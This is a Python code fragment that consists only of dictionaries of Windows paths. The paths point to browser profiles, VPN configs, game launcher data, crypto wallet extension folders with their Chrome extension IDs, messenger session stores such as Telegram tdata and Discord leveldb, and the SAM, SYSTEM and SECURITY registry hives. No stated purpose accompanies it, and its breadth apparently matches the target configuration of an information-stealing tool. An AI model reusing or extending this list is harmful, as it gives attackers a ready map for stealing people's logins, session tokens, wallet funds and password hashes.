BROWSERS = {
    "Chrome_Default": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default",
    "Chrome_Profile1": r"%LOCALAPPDATA%\Google\Chrome\User Data\Profile 1",
    "Chrome_Profile2": r"%LOCALAPPDATA%\Google\Chrome\User Data\Profile 2",
    "Edge_Default": r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default",
    "Edge_Profile1": r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Profile 1",
    "Brave_Default": r"%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default",
    "Brave_Profile1": r"%LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Profile 1",
    "Opera_Stable": r"%APPDATA%\Opera Software\Opera Stable",
    "Opera_GX": r"%APPDATA%\Opera Software\Opera GX Stable",
    "Vivaldi_Default": r"%LOCALAPPDATA%\Vivaldi\User Data\Default",
    "Vivaldi_Profile1": r"%LOCALAPPDATA%\Vivaldi\User Data\Profile 1",
    "Firefox_Profiles": r"%APPDATA%\Mozilla\Firefox\Profiles",
    "TorBrowser_Profile": r"%APPDATA%\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default",
    "Yandex_Default": r"%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\Default",
    "CentBrowser_Default": r"%LOCALAPPDATA%\CentBrowser\User Data\Default",
    "SRWareIron_Default": r"%LOCALAPPDATA%\Iron\User Data\Default",
    "ComodoDragon_Default": r"%LOCALAPPDATA%\Comodo\Dragon\User Data\Default",
    "TorchBrowser_Default": r"%LOCALAPPDATA%\Torch\User Data\Default",
    "Slimjet_Default": r"%LOCALAPPDATA%\Slimjet\User Data\Default",
    "UCBrowser_Default": r"%LOCALAPPDATA%\UC Browser\User Data\Default",
    "Maxthon5_Guest": r"%APPDATA%\Maxthon5\Users\guest",
    "AvastSecureBrowser": r"%LOCALAPPDATA%\AVAST Software\Browser\User Data\Default",
    "ColibriBrowser": r"%LOCALAPPDATA%\Colibri\User Data\Default",
    "Waterfox": r"%APPDATA%\Waterfox\Profiles",
    "LibreWolf": r"%APPDATA%\librewolf\Profiles",
}

VPNS = {
    "NordVPN": r"%APPDATA%\NordVPN",
    "NordVPN_Logs": r"%LOCALAPPDATA%\NordVPN",
    "ExpressVPN": r"%APPDATA%\ExpressVPN",
    "Surfshark": r"%APPDATA%\Surfshark",
    "ProtonVPN": r"%APPDATA%\ProtonVPN",
    "Mullvad": r"%APPDATA%\Mullvad VPN",
    "Windscribe": r"%APPDATA%\Windscribe",
    "PrivateInternetAccess": r"%APPDATA%\PIA",
    "CyberGhost": r"%APPDATA%\CyberGhost",
    "IPVanish": r"%APPDATA%\IPVanish",
    "TunnelBear": r"%APPDATA%\TunnelBear",
    "HotspotShield": r"%APPDATA%\Hotspot Shield",
    "HideMyAss": r"%APPDATA%\HideMyAss",
    "VyprVPN": r"%APPDATA%\VyprVPN",
    "PureVPN": r"%APPDATA%\PureVPN",
    "Astrill": r"%APPDATA%\Astrill",
    "OpenVPN_Config": r"%PROGRAMFILES%\OpenVPN\config",
    "WireGuard": r"%APPDATA%\WireGuard",
    "SoftEtherVPN": r"%PROGRAMFILES%\SoftEther VPN Client",
    "Proxifier": r"%APPDATA%\Proxifier",
    "Psiphon": r"%APPDATA%\Psiphon3",
    "Lantern": r"%APPDATA%\Lantern",
    "AmneziaVPN": r"%APPDATA%\AmneziaVPN",
    "Outline": r"%APPDATA%\Outline",
    "V2RayN": r"%APPDATA%\v2rayN",
}

GAMES = {
    "Steam_Userdata": r"%PROGRAMFILES(X86)%\Steam\userdata",
    "Steam_Config": r"%PROGRAMFILES(X86)%\Steam\config",
    "Epic_Saved": r"%LOCALAPPDATA%\EpicGamesLauncher\Saved",
    "Epic_Portal": r"%LOCALAPPDATA%\EpicGamesLauncher\Portal",
    "Ubisoft_Launcher": r"%LOCALAPPDATA%\Ubisoft Game Launcher",
    "Battle_net": r"%PROGRAMDATA%\Battle.net",
    "EA_Desktop": r"%LOCALAPPDATA%\EA Desktop",
    "Minecraft": r"%APPDATA%\.minecraft",
    "Roblox": r"%LOCALAPPDATA%\Roblox",
    "GenshinImpact": r"%LOCALAPPDATA%\miHoYo\Genshin Impact",
    "HonkaiStarRail": r"%LOCALAPPDATA%\miHoYo\Star Rail",
    "Valorant": r"%LOCALAPPDATA%\Riot Games\VALORANT",
    "LeagueOfLegends": r"%PROGRAMDATA%\Riot Games\League of Legends",
    "Riot_Client": r"%PROGRAMDATA%\Riot Games\Riot Client",
    "CS2": r"%PROGRAMFILES(X86)%\Steam\userdata\*\730\local",
    "Dota2": r"%PROGRAMFILES(X86)%\Steam\userdata\*\570\remote",
    "Fortnite": r"%LOCALAPPDATA%\FortniteGame\Saved",
    "ApexLegends": r"%USERPROFILE%\Saved Games\Respawn\Apex",
    "CallOfDutyMW": r"%PROGRAMFILES%\Call of Duty Modern Warfare",
    "Warzone": r"%PROGRAMDATA%\Battle.net\Agent\Logs",
    "TheSims4": r"%USERPROFILE%\Documents\Electronic Arts\The Sims 4",
    "Cyberpunk2077": r"%USERPROFILE%\Saved Games\CD Projekt Red\Cyberpunk 2077",
    "GTAV": r"%USERPROFILE%\Documents\Rockstar Games\GTA V",
    "Playnite": r"%APPDATA%\Playnite",
    "HeroicGames": r"%APPDATA%\heroic",
}

WALLETS = {
    "MetaMask_Chromium": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn",
    "MetaMask_Firefox": r"%APPDATA%\Mozilla\Firefox\Profiles\*\extensions\{webextension@metamask.io}",
    "Exodus": r"%APPDATA%\Exodus",
    "Atomic": r"%APPDATA%\atomic",
    "Electrum": r"%APPDATA%\Electrum\wallets",
    "TrustWallet": r"%APPDATA%\Trust Wallet",
    "BinanceChain": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp",
    "CoinbaseWallet": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad",
    "Phantom": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa",
    "Ronin": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec",
    "Rabby": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch",
    "Zerion": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\klghhnkiagbcgflhldadnlllibgcfhbo",
    "Rainbow": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\opcgngfogmkijmgjpamfmlbggjdmhcbg",
    "Guarda": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\pljbjcehnhcnofmkdbjolghdcjnmekia",
    "MathWallet": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmkmmhfjbbgphhbgk",
    "SafePal": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\meojnmhmljfkahchmkfpgbokpifkfnmk",
    "Coin98": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg",
    "TronLink": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec",
    "OKXWallet": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge",
    "BitKeep": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak",
    "TokenPocket": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjibnkmnkmhgljbgpkekemcglfkh",
    "LeapWallet": r"%APPDATA%\Leap Wallet",
    "Keplr": r"%APPDATA%\Keplr",
    "Backpack": r"%APPDATA%\Backpack",
    "Solflare": r"%APPDATA%\Solflare",
}

MESSENGERS = {
    "TelegramDesktop": r"%APPDATA%\Telegram Desktop\tdata",
    "Discord_Stable": r"%APPDATA%\discord\Local Storage\leveldb",
    "Discord_Canary": r"%APPDATA%\discordcanary\Local Storage\leveldb",
    "Signal": r"%APPDATA%\Signal",
    "WhatsApp": r"%APPDATA%\WhatsApp",
    "Skype": r"%APPDATA%\Microsoft\Skype for Desktop",
    "Element": r"%APPDATA%\Element",
    "Slack": r"%APPDATA%\Slack\storage",
    "MicrosoftTeams": r"%APPDATA%\Microsoft\Teams",
    "Zoom": r"%APPDATA%\Zoom\data",
    "Viber": r"%APPDATA%\ViberPC",
    "Line": r"%APPDATA%\Line",
    "WeChat": r"%APPDATA%\Tencent\WeChat",
    "ICQ": r"%APPDATA%\ICQ",
    "Pidgin": r"%APPDATA%\Pidgin",
    "Trillian": r"%APPDATA%\Trillian",
    "Tox_qTox": r"%APPDATA%\qTox",
    "Jami": r"%APPDATA%\jami",
    "Session": r"%APPDATA%\Session",
    "Briar": r"%APPDATA%\Briar",
    "Threema": r"%APPDATA%\Threema",
    "Wire": r"%APPDATA%\Wire",
    "DeltaChat": r"%APPDATA%\DeltaChat",
    "SimplexChat": r"%APPDATA%\simplex",
    "Cwtch": r"%APPDATA%\cwtch",
}

SYSTEM = {
    "UserTemp": r"%TEMP%",
    "WindowsTemp": r"C:\Windows\Temp",
    "AppDataRoaming": r"%APPDATA%",
    "AppDataLocal": r"%LOCALAPPDATA%",
    "ProgramData": r"%PROGRAMDATA%",
    "HostsFile": r"%WINDIR%\System32\drivers\etc\hosts",
    "Prefetch": r"C:\Windows\Prefetch",
    "RecentFiles": r"%APPDATA%\Microsoft\Windows\Recent",
    "NTUSER_DAT": r"%USERPROFILE%\NTUSER.DAT",
    "UsrClass_dat": r"%LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat",
    "SAM": r"C:\Windows\System32\config\SAM",
    "SYSTEM": r"C:\Windows\System32\config\SYSTEM",
    "SECURITY": r"C:\Windows\System32\config\SECURITY",
    "SOFTWARE": r"C:\Windows\System32\config\SOFTWARE",
    "WiFiProfiles": r"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces",
    "BluetoothKeys": r"C:\ProgramData\Microsoft\Bluetooth\Keys",
    "EventLogs": r"C:\Windows\System32\winevt\Logs",
    "PowerShellHistory": r"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt",
    "RunMRU": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
    "TypedPaths": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths",
    "WordWheelQuery": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery",
    "LastVisitedPidlMRU": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU",
    "OpenSavePidlMRU": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU",
    "RecentDocs": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs",
}
